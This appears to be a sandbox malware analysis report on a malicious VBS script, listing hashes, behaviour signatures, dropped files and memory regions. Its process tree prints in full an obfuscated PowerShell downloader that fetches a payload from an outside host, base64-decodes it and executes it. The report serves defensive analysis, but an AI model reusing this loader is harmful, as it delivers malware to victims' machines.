Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    29/03/2024, 02:37

General

  • Target

    b9dcf5b6299259d5409b222121e3f866ef697ba83d488a83846196efd6d143f3.vbs

  • Size

    237KB

  • MD5

    09e1b1aa6f21931c821f0dbb8ffb630a

  • SHA1

    300abf78bd3f51937752d82e610108a6025d9baa

  • SHA256

    b9dcf5b6299259d5409b222121e3f866ef697ba83d488a83846196efd6d143f3

  • SHA512

    c51bf4a8085af153ec06921b59ce5f9c735916186a992abbb29539e9e5fd597f9bcfd9c79fecdec1e947a5fd5d227a62f203d3b596e1f4d1579b1d73246e283e

  • SSDEEP

    6144:Z5hQMLtOBxJrv5lttSP4KuK8jWwoipSRUiGT9rS2fTicm7fIQzmFAjX:bkVB5+jX

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b9dcf5b6299259d5409b222121e3f866ef697ba83d488a83846196efd6d143f3.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2804
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Analopos Fenter Accidental Afsnringens Allgovite #>;<#Aaler Stut Slgtleddet Agitators #>;New-Item -Path 'Celledonorens:\Filingen' -Name 'Nyskabelsens' -ItemType 'file';<#Beboelsesejendom reputationer Sonnetish Christianittens Bellbirds #>;Function Giftigheder ([String]$Uensartet140){$Pyretotherapymmunopathology = 2;For($Pyretotherapy=1; $Pyretotherapy -lt $Uensartet140.Length-1; $Pyretotherapy+=$Pyretotherapymmunopathology){ $Anneks = $Uensartet140.Substring($Pyretotherapy, $Turcykels); $Reoccurs=$Reoccurs+$Anneks; }$Reoccurs;}$Turcykels = (cmd /c 'echo 1 && exit');if (Test-Path 'Celledonorens:\Filingen\Nyskabelsens') {$Turcykels--};$Uncubically=Giftigheder 'fiDeRxH ';$Talmagi=Giftigheder 'GT r,a,n sSfMe.rDrHiGnPg. ';$Chymifying = Giftigheder ' \RsGyNs wRo wU6.4B\TWSi.n dFoEwIs.P o wTeSrRSPhDe,ljl \Av,1V.E0S\FpAo.w,eNr s,h e.lSlS. e x,eS ';function Bunks ($Careire){&($Uncubically) ($Careire);}$Tachists=Giftigheder ' hDtLt p : /C/NjUaNw,aSpBhMaBr.m,aDcAeNu t,iTcBaHl.sA.Hc.o mB/.PBr e c.o nEtHr,o.lSlOeCd .EdRw.p ';$Udsknke=$Tachists.split([char]62);$Tachists=$Udsknke[0];Bunks (Giftigheder 'P$Og lKo b a l :ODPeAlSa.rCbIe.j dMe rEs =S$Te n vR:LwBi,n d i r. ') ;Bunks (Giftigheder 'E$Ag l o bSaIl :AB.e,sHiFn d.eHnsdCe s,=S$SDPeDlSa.r bTeRjOdKe,r,s +.$,CEh y.mUiffBy iPnFg ') ;Bunks (Giftigheder 'N$ gTl oIb,a,l :,L aSnDdFf aCs t e s =, R( ( gTwEm i DwRiAnO3A2L_KpHrYoEcEeBs s. B-UF ,PMrSo,cDe.sLs ICdB=.$ {FPSI D },)..,C oSmOmBa nHdSL.i nSe.)B -BsLpMl iDtK .[.c h aor ].3 4G ');Bunks (Giftigheder ' $fg,lPo,b aUlU: JkaMrTh,e a,dB ,=D .$ L,a.n dOfPaHsMt eIsN[A$OL a,n,dRf a sBtfe sr..c oFuFn tS-R2T]U ');Bunks (Giftigheder 'S$sgtlHoFbHa lK:BSAl,emn d.rOi a n =P(bT eAs.t -,P aKtHh. .$ B,eFsFiBn,dHe n dNezsR)N .-VA nMd, E( [ I nCtoPKtOrT],:,:Ss i,z.eG A- eGq. E8S), ') ;if ($Slendrian) {& $Besindendes $Jarhead;} else {;$Bookwright=Giftigheder ' $,gCl oUb.a l,:HK lPaTg e,s.kTr i vaeIlEs eGnR B=P S tTa r,tC- B,iJtTs T.r aLn,s f egr S-,S oHu,rFc.e K$FT aPcNhTi s.tEsU .-.DTe sftSi nWa.tNiAoSnE ,$ DpeRlcaPr,bDe jSdVe.rPs ';Bunks (Giftigheder 'S$Sg,lNoTbTaSlT: D e,lPa r.b edjSd e,rSsK=E$Te n vS: a p p d,aStHa ') ;Bunks (Giftigheder '.I m p oRr,tW-EMEo d u lLeK EB i.t s T rKaSnSs fUeGrN ') ;$Delarbejders=$Delarbejders+'\Stableren.Lys' ;Bunks (Giftigheder 'S$ g lAo.b a lV:,H e r imt a gSe.sE=S( TPe sOt.- PGaAtahB a$ODIeSlEabr.b e.jSd.eer,sM), ') ;while (-not $Heritages) {Bunks (Giftigheder 'FI f S(S$.K.l aIg e s kLrIi v e,lUs eIn,. JSo,b SSt.attFeV S- eAq F$ T aOl,mCaHg i )m {,S tAa r t - S,lBeBe pS ,1G}MeSl,s eD{GS.teaBrStU-CS lheKe p R1.; B,u.n kFsT $SB oPoDkYw r iJgAhGtA} ');Bunks (Giftigheder ' $.g lUo.bBaCl :,HUe rMiEt a.gFeTsC=.( TFessAt -oPma.t.h ,$sDMe lPaCr bje,jcd,eAr.sA)f ') ;$Tachists=$Udsknke[$Centralforeningers++%$Udsknke.count];}Bunks (Giftigheder ',$ g l oSb.aCl :TLEaMr,gFe kPoWbMoUlMdM =S TGSeGtA-SC oan t eMn t, $ DGeLl aTrIb.eUj.dNe r,s, ');Bunks (Giftigheder 'S$.g l o.bTaPlt: A.f p iNlsnUiOnFgSeHr n,ec ,=T [TSSyTsPt,e m . CIoDnIv.esr tC].:,: FSr,o m B aUsFeB6R4 S,t,r iBnSg ( $HL.a r g,eMk oUbSo.lGd.), ');Bunks (Giftigheder ' $,gGl oUbTaIlA:DBlo.f f ofs. =C .[ SNySsOtMesmF. T e xRtS. E nUc o d,iEn gH]O:M:.APS,C IPI,.kGSePt,SDt.r iBnTg ( $ ASfsp.i l nDi,n g eBr nKeA)L ');Bunks (Giftigheder ',$Sg lUonb.a.l,: BFe sRk fCt i.g.eTl sOeAsDtOe r a.pTeSu t sC=T$.BAoIf f o,s .Cs,u,bFsMt,rHi nDgW(C3 2S1F8 1I0 ,.2 4F6V7k2S)T ');Bunks $Beskftigelsesterapeuts;};;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2988
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo 1 && exit"
        3⤵
          PID:1308
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Analopos Fenter Accidental Afsnringens Allgovite #>;<#Aaler Stut Slgtleddet Agitators #>;New-Item -Path 'Celledonorens:\Filingen' -Name 'Nyskabelsens' -ItemType 'file';<#Beboelsesejendom reputationer Sonnetish Christianittens Bellbirds #>;Function Giftigheder ([String]$Uensartet140){$Pyretotherapymmunopathology = 2;For($Pyretotherapy=1; $Pyretotherapy -lt $Uensartet140.Length-1; $Pyretotherapy+=$Pyretotherapymmunopathology){ $Anneks = $Uensartet140.Substring($Pyretotherapy, $Turcykels); $Reoccurs=$Reoccurs+$Anneks; }$Reoccurs;}$Turcykels = (cmd /c 'echo 1 && exit');if (Test-Path 'Celledonorens:\Filingen\Nyskabelsens') {$Turcykels--};$Uncubically=Giftigheder 'fiDeRxH ';$Talmagi=Giftigheder 'GT r,a,n sSfMe.rDrHiGnPg. ';$Chymifying = Giftigheder ' \RsGyNs wRo wU6.4B\TWSi.n dFoEwIs.P o wTeSrRSPhDe,ljl \Av,1V.E0S\FpAo.w,eNr s,h e.lSlS. e x,eS ';function Bunks ($Careire){&($Uncubically) ($Careire);}$Tachists=Giftigheder ' hDtLt p : /C/NjUaNw,aSpBhMaBr.m,aDcAeNu t,iTcBaHl.sA.Hc.o mB/.PBr e c.o nEtHr,o.lSlOeCd .EdRw.p ';$Udsknke=$Tachists.split([char]62);$Tachists=$Udsknke[0];Bunks (Giftigheder 'P$Og lKo b a l :ODPeAlSa.rCbIe.j dMe rEs =S$Te n vR:LwBi,n d i r. ') ;Bunks (Giftigheder 'E$Ag l o bSaIl :AB.e,sHiFn d.eHnsdCe s,=S$SDPeDlSa.r bTeRjOdKe,r,s +.$,CEh y.mUiffBy iPnFg ') ;Bunks (Giftigheder 'N$ gTl oIb,a,l :,L aSnDdFf aCs t e s =, R( ( gTwEm i DwRiAnO3A2L_KpHrYoEcEeBs s. B-UF ,PMrSo,cDe.sLs ICdB=.$ {FPSI D },)..,C oSmOmBa nHdSL.i nSe.)B -BsLpMl iDtK .[.c h aor ].3 4G ');Bunks (Giftigheder ' $fg,lPo,b aUlU: JkaMrTh,e a,dB ,=D .$ L,a.n dOfPaHsMt eIsN[A$OL a,n,dRf a sBtfe sr..c oFuFn tS-R2T]U ');Bunks (Giftigheder 'S$sgtlHoFbHa lK:BSAl,emn d.rOi a n =P(bT eAs.t -,P aKtHh. .$ B,eFsFiBn,dHe n dNezsR)N .-VA nMd, E( [ I nCtoPKtOrT],:,:Ss i,z.eG A- eGq. E8S), ') ;if ($Slendrian) {& $Besindendes $Jarhead;} else {;$Bookwright=Giftigheder ' $,gCl oUb.a l,:HK lPaTg e,s.kTr i vaeIlEs eGnR B=P S tTa r,tC- B,iJtTs T.r aLn,s f egr S-,S oHu,rFc.e K$FT aPcNhTi s.tEsU .-.DTe sftSi nWa.tNiAoSnE ,$ DpeRlcaPr,bDe jSdVe.rPs ';Bunks (Giftigheder 'S$Sg,lNoTbTaSlT: D e,lPa r.b edjSd e,rSsK=E$Te n vS: a p p d,aStHa ') ;Bunks (Giftigheder '.I m p oRr,tW-EMEo d u lLeK EB i.t s T rKaSnSs fUeGrN ') ;$Delarbejders=$Delarbejders+'\Stableren.Lys' ;Bunks (Giftigheder 'S$ g lAo.b a lV:,H e r imt a gSe.sE=S( TPe sOt.- PGaAtahB a$ODIeSlEabr.b e.jSd.eer,sM), ') ;while (-not $Heritages) {Bunks (Giftigheder 'FI f S(S$.K.l aIg e s kLrIi v e,lUs eIn,. JSo,b SSt.attFeV S- eAq F$ T aOl,mCaHg i )m {,S tAa r t - S,lBeBe pS ,1G}MeSl,s eD{GS.teaBrStU-CS lheKe p R1.; B,u.n kFsT $SB oPoDkYw r iJgAhGtA} ');Bunks (Giftigheder ' $.g lUo.bBaCl :,HUe rMiEt a.gFeTsC=.( TFessAt -oPma.t.h ,$sDMe lPaCr bje,jcd,eAr.sA)f ') ;$Tachists=$Udsknke[$Centralforeningers++%$Udsknke.count];}Bunks (Giftigheder ',$ g l oSb.aCl :TLEaMr,gFe kPoWbMoUlMdM =S TGSeGtA-SC oan t eMn t, $ DGeLl aTrIb.eUj.dNe r,s, ');Bunks (Giftigheder 'S$.g l o.bTaPlt: A.f p iNlsnUiOnFgSeHr n,ec ,=T [TSSyTsPt,e m . CIoDnIv.esr tC].:,: FSr,o m B aUsFeB6R4 S,t,r iBnSg ( $HL.a r g,eMk oUbSo.lGd.), ');Bunks (Giftigheder ' $,gGl oUbTaIlA:DBlo.f f ofs. =C .[ SNySsOtMesmF. T e xRtS. E nUc o d,iEn gH]O:M:.APS,C IPI,.kGSePt,SDt.r iBnTg ( $ ASfsp.i l nDi,n g eBr nKeA)L ');Bunks (Giftigheder ',$Sg lUonb.a.l,: BFe sRk fCt i.g.eTl sOeAsDtOe r a.pTeSu t sC=T$.BAoIf f o,s .Cs,u,bFsMt,rHi nDgW(C3 2S1F8 1I0 ,.2 4F6V7k2S)T ');Bunks $Beskftigelsesterapeuts;};;"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:460
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo 1 && exit"
            4⤵
              PID:2144

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

        Filesize

        68KB

        MD5

        29f65ba8e88c063813cc50a4ea544e93

        SHA1

        05a7040d5c127e68c25d81cc51271ffb8bef3568

        SHA256

        1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

        SHA512

        e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        344B

        MD5

        208b5959973375e73605f61e7cd99124

        SHA1

        2e78387cca36ebffecf81d4c4dd5d5164743953b

        SHA256

        b1a19c0c36c6481092608bdc41128dc015818a0ff32769b5a9c12ef823d4c5cf

        SHA512

        efe582aebdf82282eadffc6db72e41e3cfb4b27ce16c9eec1d4341e33fbb30b023cf60bb5939f703bdfcc8a88c7dfcbbc1e0bba876ddc7199638c4d950aad29e

      • C:\Users\Admin\AppData\Local\Temp\Cab738D.tmp

        Filesize

        65KB

        MD5

        ac05d27423a85adc1622c714f2cb6184

        SHA1

        b0fe2b1abddb97837ea0195be70ab2ff14d43198

        SHA256

        c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

        SHA512

        6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

      • C:\Users\Admin\AppData\Local\Temp\Tar739F.tmp

        Filesize

        171KB

        MD5

        9c0c641c06238516f27941aa1166d427

        SHA1

        64cd549fb8cf014fcd9312aa7a5b023847b6c977

        SHA256

        4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

        SHA512

        936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

      • C:\Users\Admin\AppData\Local\Temp\Tar75A8.tmp

        Filesize

        177KB

        MD5

        435a9ac180383f9fa094131b173a2f7b

        SHA1

        76944ea657a9db94f9a4bef38f88c46ed4166983

        SHA256

        67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

        SHA512

        1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\05OH4SSOT4D4K2MYYATW.temp

        Filesize

        7KB

        MD5

        7ff1982c9db5dc2de5f3bb9cccdd5646

        SHA1

        128f85811ebe9aaf29628b2a7ec39e1f8f748738

        SHA256

        cebdfb953fd45f638a1e2b195d9c36a97fc2f271ebabea60f7490525000cbdf5

        SHA512

        ce1400f0be0e9ca6752103dde98f7f470cc11d047228aa3aaa7a38101c4fa3b1bc7949840845bbc4049167af2e60fd052c142c244af4028731e003ac3b040f99

      • memory/460-106-0x0000000001E00000-0x0000000001E40000-memory.dmp

        Filesize

        256KB

      • memory/460-107-0x00000000730C0000-0x000000007366B000-memory.dmp

        Filesize

        5.7MB

      • memory/460-105-0x00000000730C0000-0x000000007366B000-memory.dmp

        Filesize

        5.7MB

      • memory/460-88-0x0000000001E00000-0x0000000001E40000-memory.dmp

        Filesize

        256KB

      • memory/460-86-0x00000000730C0000-0x000000007366B000-memory.dmp

        Filesize

        5.7MB

      • memory/460-87-0x0000000001E00000-0x0000000001E40000-memory.dmp

        Filesize

        256KB

      • memory/460-84-0x00000000730C0000-0x000000007366B000-memory.dmp

        Filesize

        5.7MB

      • memory/460-85-0x0000000001E00000-0x0000000001E40000-memory.dmp

        Filesize

        256KB

      • memory/2988-77-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp

        Filesize

        9.6MB

      • memory/2988-81-0x00000000029F0000-0x0000000002A70000-memory.dmp

        Filesize

        512KB

      • memory/2988-80-0x00000000029F0000-0x0000000002A70000-memory.dmp

        Filesize

        512KB

      • memory/2988-79-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp

        Filesize

        9.6MB

      • memory/2988-100-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp

        Filesize

        9.6MB

      • memory/2988-101-0x00000000029F0000-0x0000000002A70000-memory.dmp

        Filesize

        512KB

      • memory/2988-102-0x00000000029F0000-0x0000000002A70000-memory.dmp

        Filesize

        512KB

      • memory/2988-103-0x00000000029F0000-0x0000000002A70000-memory.dmp

        Filesize

        512KB

      • memory/2988-104-0x00000000029F0000-0x0000000002A70000-memory.dmp

        Filesize

        512KB

      • memory/2988-78-0x00000000029F0000-0x0000000002A70000-memory.dmp

        Filesize

        512KB

      • memory/2988-76-0x0000000001D90000-0x0000000001D98000-memory.dmp

        Filesize

        32KB

      • memory/2988-75-0x000000001B2C0000-0x000000001B5A2000-memory.dmp

        Filesize

        2.9MB